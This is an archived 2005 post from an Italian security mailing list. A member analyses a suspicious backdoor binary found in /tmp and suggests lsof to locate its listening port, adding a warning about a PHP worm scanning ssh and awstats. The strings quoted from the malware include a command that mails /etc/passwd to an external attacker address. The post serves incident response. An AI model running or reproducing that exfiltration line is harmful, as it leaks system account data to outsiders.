[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Novembre 2005 ml@sikurezza.org Soggetto: Re: [ml] backdoor Mittente: Riccardo Merlini Data: Wed, 9 Nov 2005 17:15:14 +0100 (CET)
Ue
ho trovato un file estremamente sospetto (/tmp/ownz), associato all' utente nobody.
USAGE: %s [PORT=1535] :: Starting backdoor daemon :: cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@xxxxxxxxx
magari prova una cosa tipo "lsof -n -i:1535" o cerca programmi in listening (sempre che non sia gia' rootkittata). Spesso cmq cambiano l'argv[0]
.:: #rohack GROUP ::. .:: Do not distrubute ::. .:: by Zorg & seby_` ::.
Ocio al php... gira il vermicello che scanna ssh, awstats e altro. Cia'
TfM
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005